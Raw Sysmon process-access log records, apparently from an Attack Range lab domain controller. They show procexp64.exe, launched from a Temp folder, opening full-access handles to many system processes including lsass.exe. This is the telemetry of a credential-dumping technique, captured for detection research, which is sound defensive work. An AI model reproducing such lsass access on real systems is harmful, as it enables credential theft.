15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:05.907{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 